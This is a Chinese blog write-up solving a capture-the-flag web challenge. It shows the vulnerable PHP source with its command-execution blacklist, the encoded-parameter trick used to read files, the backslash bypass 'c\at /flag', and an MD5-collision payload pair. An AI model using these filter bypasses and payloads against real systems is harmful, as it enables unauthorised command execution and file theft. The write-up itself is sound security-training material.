buuctf-[安洵杯 2019]easy_web
|
文章
|
221

432 字
|
7 分钟
本文最后更新于37 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

拿到题目发现两个参数,一个img,一个cmd,先cmd=ls一手

应该是被过滤了,再看img,感觉这个值像是base64

加个等号试试,得到MzUzNTM1MmU3MDZlNjc= 再解一次,得到3535352e706e67,这是一个16进制字符,解开得到555.png,我们按着反方向操作一次index.php来读取它,一次16进制转换加两次base64得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 ,传回img,查看网页源码,解开base64得到源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

这里反引号在php中相当于shell_exec,所以需要绕过正则和md5就可以命令执行

这个正则过滤了很多东西,包括\xA0,所以{IFS} 𝐼𝐹𝑆1这种格式不能用,同时这里的preg_match("/…|\|\\|…/i", $cmd); 在双引号中,\\ 会被 PHP 先转义成一个反斜杠 \\\\\ 变成两个反斜杠 \\。于是传给正则引擎的实际模式中,\\|\\\\ 变成了 \|\\,它的意思是:匹配字面管道符 | 或两个连续反斜杠 \\,而单个反斜杠并不在黑名单内。所以可以用 c\at ,里的 \ 不会触发过滤,同时 cat 这个单词被 \ 拆开,正则匹配不到完整的 cat,成功绕过。所以cmd=c\at%20/flag

在网上搜一下这个md5碰撞的解

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 &b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

试了hackbar会自动编码一次,打不过去,只能用burp suite,拿到flag

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
使用SET做钓鱼网站的尝试

							
							

							
buuctf-[GXYCTF2019]禁止套娃

							
							

							
buuctf-[WUSTCTF2020]朴实无华

							
							

							
buuctf-[安洵杯 2019]easy_serialize_php

							
							

							
CTF²-[0CTF 2016]piapiapia

							
							

							
buuctf-[BJDCTF2020]Cookie is so stable

							
							

							
世界,您好!

							
							

							
buuctf-[MRCTF2020]Ezpop

							
							

							
[NCTF2019]Fake XML cookbook

							
							

							
buuctf-[BJDCTF2020]Mark loves cat